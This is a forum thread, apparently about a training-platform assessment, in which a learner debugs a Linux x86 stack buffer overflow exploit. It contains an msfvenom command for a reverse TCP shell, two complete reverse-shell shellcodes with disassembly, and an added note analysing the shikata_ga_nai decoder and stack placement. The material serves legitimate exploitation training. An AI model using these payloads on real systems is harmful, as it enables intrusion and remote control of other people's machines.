Shellcode crashes after making a connection to netcat in the stack-based buffer overflow tutorial

I've been stuck for 5 days at the last step of the Skills Assessment at the end of STACK-BASED BUFFER OVERFLOWS ON LINUX X86. I managed to overwrite the return address and jump to the shellcode at 0xffffcd0d. Netcat does tell me it got a connection from the shellcode. However, the program crashed right after that:

Program received signal SIGSEGV, Segmentation fault.
0xffffcd58 in ?? ()

(gdb) x/95i 0xffffcd0d
0xffffcd0d: fcmovnb st,st(0)
0xffffcd0f: fnstenv [esp-0xc]
0xffffcd13: pop edx
0xffffcd14: sub ecx,ecx
0xffffcd16: mov cl,0x12
0xffffcd18: mov esi,0x85e358f0
0xffffcd1d: xor DWORD PTR [edx+0x17],esi
0xffffcd20: add esi,DWORD PTR [edx+0x17]
0xffffcd23: xor DWORD PTR [edx],0x5c
0xffffcd26: add DWORD PTR [eax-0x7d],esi
0xffffcd29: xchg BYTE PTR [edx],dh
0xffffcd2b: cwde
0xffffcd2c: mov al,0x7b
0xffffcd2e: out dx,al
0xffffcd2f: xor eax,0x7af1f534
0xffffcd34: pop esi
0xffffcd35: enter 0xe972,0xc7
0xffffcd39: bound ecx,QWORD PTR [ebp-0x3d]
0xffffcd3c: ja 0xffffcd09
0xffffcd3e: retf
0xffffcd3f: and bl,BYTE PTR [edi]
0xffffcd41: mov bl,0x2b
0xffffcd43: aad 0xde
0xffffcd45: and ebp,DWORD PTR [esi]
0xffffcd47: aad 0x9a
0xffffcd49: fisub DWORD PTR [edi-0x178415cc]
0xffffcd4f: out 0x59,eax
0xffffcd51: aaa
0xffffcd52: or eax,DWORD PTR [ecx-0x3c730544]
0xffffcd58: push esi
0xffffcd59: imul esp,DWORD PTR [edx-0x6ce43170],0x79
0xffffcd60: ins BYTE PTR es:[edi],dx
0xffffcd61: mov ch,0x62
0xffffcd63: data16 and dl,BYTE PTR [esi]
0xffffcd66: cld
0xffffcd67: mov BYTE PTR [edx-0x6d],dh
0xffffcd6a: xor ecx,edx

(gdb) info registers
eax 0x0 0
ecx 0xffffcd58 -12968
edx 0x0 0
ebx 0x3 3
esp 0xffffcd54 0xffffcd54
ebp 0xca339372 0xca339372
esi 0x16bd 5821
edi 0x0 0
eip 0xffffcd58 0xffffcd58
eflags 0x10296 [ PF AF SF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99

One thing I observed is that the shellcode accesses memory with weird offsets that come from nowhere, e.g.

   fisub  DWORD PTR [edi-0x178415cc]
   or  eax,DWORD PTR [ecx-0x3c730544]
   imul   esp,DWORD PTR [edx-0x6ce43170],0x79

I have no idea how this can work. I know there's some kind of encoding, but
The shellcode was generated by:

msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=31337 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out shellcode

Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 425 bytes
Saved as: shellcode

This is the content of the shellcode in C string:

"\xdb\xc0\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x12\xbe\xf0\x58\xe3"
"\x85\x31\x72\x17\x03\x72\x17\x83\x32\x5c\x01\x70\x83\x86\x32"
"\x98\xb0\x7b\xee\x35\x34\xf5\xf1\x7a\x5e\xc8\x72\xe9\xc7\x62"
"\x4d\xc3\x77\xcb\xcb\x22\x1f\xb3\x2b\xd5\xde\x23\x2e\xd5\x9a"
"\xda\xa7\x34\xea\x7b\xe8\xe7\x59\x37\x0b\x81\xbc\xfa\x8c\xc3"
"\x56\x6b\xa2\x90\xce\x1b\x93\x79\x6c\xb5\x62\x66\x22\x16\xfc"
"\x88\x72\x93\x33\xca";


I then tried another approach: generating shellcode without the --bad-characters parameter:

"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00\x01\x68\x02\x00\x7a\x69\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"

00000000 31DB xor ebx,ebx
00000002 F7E3 mul ebx
00000004 53 push ebx
00000005 43 inc ebx
00000006 53 push ebx
00000007 6A02 push byte +0x2
00000009 89E1 mov ecx,esp
0000000B B066 mov al,0x66
0000000D CD80 int 0x80
0000000F 93 xchg eax,ebx
00000010 59 pop ecx
00000011 B03F mov al,0x3f
00000013 CD80 int 0x80
00000015 49 dec ecx
00000016 79F9 jns 0x11
00000018 687F000001 push dword 0x100007f
0000001D 6802007A69 push dword 0x697a0002
00000022 89E1 mov ecx,esp
00000024 B066 mov al,0x66
00000026 50 push eax
00000027 51 push ecx
00000028 53 push ebx
00000029 B303 mov bl,0x3
0000002B 89E1 mov ecx,esp
0000002D CD80 int 0x80
0000002F 52 push edx
00000030 686E2F7368 push dword 0x68732f6e
00000035 682F2F6269 push dword 0x69622f2f
0000003A 89E3 mov ebx,esp
0000003C 52 push edx
0000003D 53 push ebx
0000003E 89E1 mov ecx,esp
00000040 B00B mov al,0xb
00000042 CD80 int 0x80

I then injected this shellcode into the process memory during a gdb session. It works as expected except for one thing: the setresuid() fails when run under gdb, so I cannot get root. To be able to get root, I need to run the program from the terminal. However, in this case, the latter shellcode cannot be fed to the program at the command line (no gdb) because it contains bad characters (0x00).

Could anyone please help explain why the shellcode generated with --bad-characters does not work? What's the proper way to do this?

Thanks
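Editor's note with an added example (not code from the post, the course or Metasploit). Two things in the post are worth pinning down. First, the `x/95i` listing shows the shellcode bytes before the decoder has run: the only real instructions are the stub at the start (`fcmovnb` ... `mov esi,0x85e358f0` and the `xor [edx+0x17],esi / add esi,[edx+0x17]` loop); everything from `[edx+0x17]` onward is encoded data that only becomes the reverse-shell instructions after the loop has walked over it, so the "weird offsets" are not meant to execute as shown. Second, the register dump has esp = 0xffffcd54 while the shellcode starts at 0xffffcd0d, so the stack pointer is inside the shellcode. That matters because the stub begins with `fnstenv [esp-0xc]`, which writes a 28-byte FPU environment starting 12 bytes below esp, and the decoded payload then pushes its socket arguments, sockaddr and "//bin/sh" strings onto that same stack; any of those writes that land on bytes not yet decoded or not yet executed corrupt the payload. The C model below reproduces the decoder loop from the disassembly on a constructed stack and reports whether the payload survives for several esp positions; the offsets, the plaintext bytes and the push count are constructed assumptions, and the model over-approximates by treating any push into the decoded region as fatal (a push onto code that has already run is harmless).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Model stack (constructed layout, not taken from the post):
 *   stack[SC_OFF .. SC_OFF+0x17)           decoder stub (shikata_ga_nai-style)
 *   stack[SC_OFF+0x17 .. SC_OFF+0x17+PLEN) encoded payload, decoded in place
 * Decoder loop as seen in the post's disassembly:
 *   xor [edx+0x17],esi ; add esi,[edx+0x17] ; (add edx,4 ; loop)
 * Before it runs, "fnstenv [esp-0xc]" stores a 28-byte FPU environment
 * starting 12 bytes BELOW esp, and "pop edx" then raises esp by 4.
 */
#define STACK_LEN   0x100
#define SC_OFF      0x80
#define STUB_LEN    0x17            /* decoded dwords start at [edx+0x17] */
#define PLEN        0x48            /* 18 dwords, matching "mov cl,0x12" in the post */
#define NDW         (PLEN / 4)
#define FNSTENV_LEN 28              /* 32-bit protected-mode FPU environment */
#define ENC_LO      (SC_OFF + STUB_LEN)
#define ENC_HI      (ENC_LO + PLEN)

static uint32_t ld32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void st32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Constructed plaintext standing in for the real decoded shellcode. */
static void make_plain(uint8_t *out)
{
    for (int i = 0; i < PLEN; i++)
        out[i] = (uint8_t)(0xA0 + i);
}

/* Inverse of the decoder loop: c_i = p_i ^ k_i ; k_{i+1} = k_i + p_i (mod 2^32). */
void sgn_encode(uint8_t *dst, const uint8_t *plain, uint32_t key)
{
    for (int i = 0; i < NDW; i++) {
        uint32_t p = ld32(plain + 4 * i);
        st32(dst + 4 * i, p ^ key);
        key += p;
    }
}

/* The decoder loop exactly as the stub executes it, in place. */
void sgn_decode_in_place(uint8_t *enc, uint32_t key)
{
    for (int i = 0; i < NDW; i++) {
        uint32_t p = ld32(enc + 4 * i) ^ key;   /* xor [edx+0x17],esi */
        st32(enc + 4 * i, p);
        key += p;                               /* add esi,[edx+0x17] */
    }
}

/*
 * One simulated run. esp_off: model esp (offset into stack[]) when the stub
 * starts. npushes: dwords the decoded payload pushes afterwards (socket args,
 * sockaddr, "//bin/sh" ... for a reverse shell). Returns 1 if the payload
 * decoded intact and no push landed on decoded code, else 0; *reason (may be
 * NULL) names the first problem. Any push into the decoded region is counted
 * as fatal, which over-approximates slightly (see the note above the block).
 */
int sgn_run(long esp_off, uint32_t key, int npushes, const char **reason)
{
    uint8_t stack[STACK_LEN], plain[PLEN];
    memset(stack, 0x90, sizeof stack);              /* everything else: NOP sled */
    make_plain(plain);
    sgn_encode(stack + ENC_LO, plain, key);

    /* fnstenv [esp-0xc]: 28 bytes written from esp-12 upward. The real contents
     * (control/status/tag words, FIP, ...) are modelled as zero; only the
     * footprint matters for this question. */
    for (long i = 0; i < FNSTENV_LEN; i++) {
        long a = esp_off - 0xc + i;
        if (a >= 0 && a < STACK_LEN)
            stack[a] = 0x00;
    }
    esp_off += 4;                                   /* pop edx */

    sgn_decode_in_place(stack + ENC_LO, key);
    if (memcmp(stack + ENC_LO, plain, PLEN) != 0) {
        if (reason) *reason = "fnstenv [esp-0xc] overwrote encoded bytes before they were decoded";
        return 0;
    }
    /* The decoded payload now runs and pushes onto the same stack. */
    for (int i = 0; i < npushes; i++) {
        esp_off -= 4;
        if (esp_off + 4 > ENC_LO && esp_off < ENC_HI) {
            if (reason) *reason = "the payload's own push landed on decoded code";
            return 0;
        }
    }
    if (reason) *reason = "ok";
    return 1;
}

int main(void)
{
    const char *why;
    /* esp inside the blob, as in the post: 0xffffcd54 - 0xffffcd0d = 0x47 */
    printf("esp inside shellcode   : %d (%s)\n", sgn_run(SC_OFF + 0x47, 0x85e358f0, 12, &why), why);
    /* esp just above the blob: a "[sled][shellcode][EIP]" layout with no adjustment */
    printf("esp 4 bytes above      : %d (%s)\n", sgn_run(ENC_HI + 4, 0x85e358f0, 12, &why), why);
    /* fnstenv misses, but the payload's pushes still walk down into its own code */
    printf("esp 16 bytes above     : %d (%s)\n", sgn_run(ENC_HI + 0x10, 0x85e358f0, 12, &why), why);
    /* esp moved well below the blob first, e.g. by a prepended stack adjustment */
    printf("esp moved below        : %d (%s)\n", sgn_run(SC_OFF - 0x20, 0x85e358f0, 12, &why), why);
    return 0;
}
```

The usual fix for the failing cases is to make the stack pointer land well below the buffer before the stub runs: either lay the buffer out so the return lands with esp beneath the shellcode plus a margin, or prepend a stack adjustment such as `add esp,-0xdac` (bytes `\x81\xc4\x54\xf2\xff\xff`, none of which is in the post's bad-character list) to the msfvenom output. The model treats the adjustment as simply a different esp_off; it does not execute any shellcode.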

nvm, I found the issue and passed the assessment. It was due to memory overwriting. It turned out that the way the buffer of 0x55, NOPs and shellcode is formed in the course itself is totally WRONG.

Hi @toannds. I think I may be in the same situation as you. Can you clarify how you prepared the right buffer? (DM me if you want)

@toannds nvm, it was a problem with the msfvenom shellcode

Hi, I'm stuck on this one too. I (think) I got all the steps BUT can't connect to the reverse shell; I'm doing it via SSH on the HTB Academy machine. Any help would be nice.

It worked, but I'm still trying to get root.

@PWR2DPPL Have you got root access?